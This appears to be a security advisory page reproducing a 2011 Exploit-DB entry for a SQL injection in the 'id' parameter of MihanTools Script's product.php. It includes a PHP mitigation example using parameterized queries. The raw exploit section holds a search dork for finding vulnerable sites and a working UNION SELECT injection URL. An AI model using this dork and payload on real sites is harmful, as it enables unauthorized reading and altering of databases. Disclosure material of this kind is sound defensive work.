Vendor: MihanTools Script
By: WHITE_DEVIL
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: MihanTools Script
Affected Version From: all version
Affected Version To: all version
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Sp2
2011

MihanTools Script SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'product.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in the application's database. This can allow the attacker to steal sensitive information from the database, modify data, deface the site, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before it is passed to the database.
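The mitigation above, as an added example that is not MihanTools code: a product lookup that allow-lists the 'id' value as a positive integer and binds it through a prepared statement. The `products` table, its columns, the in-memory SQLite database and the function names are assumptions made for illustration; PHP 8 with PDO is assumed.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-in for the script's database (constructed sample data).
function demoDb(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)');
    $pdo->exec("INSERT INTO products (id, name, price) VALUES (1, 'Sample item', 9.99)");
    return $pdo;
}

// Allow-list validation: the id must be a short run of decimal digits, nothing else.
function parseProductId(mixed $raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

// Parameterized lookup: the value is bound as data, never concatenated into SQL.
function findProduct(PDO $pdo, mixed $rawId): ?array
{
    $id = parseProductId($rawId);
    if ($id === null) {
        return null; // caller should answer 400/404 without touching the database
    }
    $stmt = $pdo->prepare('SELECT id, name, price FROM products WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = demoDb();
var_dump(findProduct($pdo, '1'));                         // well-formed id
var_dump(findProduct($pdo, '-1 union select version()')); // value shaped like the request in this advisory
```

In a real handler the first argument would come from `$_GET['id'] ?? null`, and a null result should produce an error response rather than a database error message.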

Exploit-DB raw data:

# Exploit Title: MihanTools Script SQL Injection Vunerability  
# Platform: php  
# Date: 09.02.2011  
# Author: WHITE_DEVIL  
# Software Link: http://www.mihantools.ir/   
# Version: all version  
# Tested on: Windows Sp2  
# Mail: Mr.web70@yahoo.com  
# Dork: inurl:product.php?id= *Powered by MihanTools* 
# Exploit:  

http://localhost/product.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14--  
  

# Greetings:  
IRAQ_JAGUAR, Joker_Sql, Karar_Alshami, Karar_Aljbory